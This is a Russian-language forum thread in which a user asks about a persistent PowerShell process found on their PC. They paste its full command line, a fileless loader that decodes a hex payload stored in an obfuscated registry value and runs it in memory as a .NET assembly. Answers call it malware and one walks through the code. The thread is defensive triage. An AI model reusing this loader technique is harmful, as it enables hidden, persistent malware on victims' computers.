@Nordman99

Что бы значил такой процесс?

Всем привет, подскажите, застукал у себя на компе процесс павершелла запущенный с такими параметрами:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -noexit -Command "function DE0PB([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci' -name 'dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci').dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci;$_b=$_b.replace('Р•','E');[byte[]]$_0 = DE0PB($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);"

Если его прибить то после перезагрузки он запускается снова, отследить что его запускает не могу - нигде ни в какой автозагрузке не вижу никого скрипта запуска этого процесса, поиск по всему реестру по записи powrshell.exe тоже результатов не дал, записи о powershell.exe есть но не с такими параметрами запуска, утилита autoruns.exe из Sysinternals тоже ничего не показала, в планировщике задач тоже не увидел ничего запускающего павершелл с такими параметрами, подскажите какие еще есть способы выяснить что запускает этот процесс павершелла?
И самое главное - что весь этот процесс с этими параметрами значит комуто это чтото говорит?
Очень смахивает на нездоровую вирусную активность, вроде Защитник Винды стоит и работает
  • Вопрос задан
  • 415 просмотров
Решения вопроса 1
@azarij
В меру опытный никто
да, какую-то заразу поймали:
https://www.joesandbox.com/analysis/188751/1/html
я бы не искал откуда оно, а отформатировал систему и начал бы с нуля. отличный повод.
поискать можно, конечно, и почистить, но где гарантия, что вычистите на 100%?
Ответ написан
Пригласить эксперта
Ответы на вопрос 2
@alhaos
function DE0PB([string]$s) {
   $H = @()
   for ($i = 0; $i -lt $s.Length; $i += 2) {
      $H += [Byte]::Parse($s.Substring($i, 2), [System.Globalization.NumberStyles]::HexNumber);
   };
   return $H; 
};
# функция распарсивает строку записаную hex симвалами по два в байты
$_b = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci' -name 'dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci').dMRLYUkOsPUxocGwuwjSSNZqQMPtNbLhGeyfrlsTCBSrqqahIWUJATEASqgIDqPZzXxZCGzpzpyDoPIChjZuJhLYZdhmoJluOBhsbpci;
# зачение ключа реестра в $_b
$_b = $_b.replace('Р•', 'E');
# замена в нем Р• на E
[byte[]]$_0 = DE0PB($_b);
# строковое значение распарсивается на байты
$_1 = [System.Threading.Thread]::GetDomain().Load($_0); $_1.EntryPoint.invoke($null, $null);
# тут она запускается )))
Ответ написан
Комментировать
CityCat4
@CityCat4 Куратор тега Информационная безопасность
Внимание! Изменился адрес почты!
Если вдруг на твой компьютер просочился злобный вирус...
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы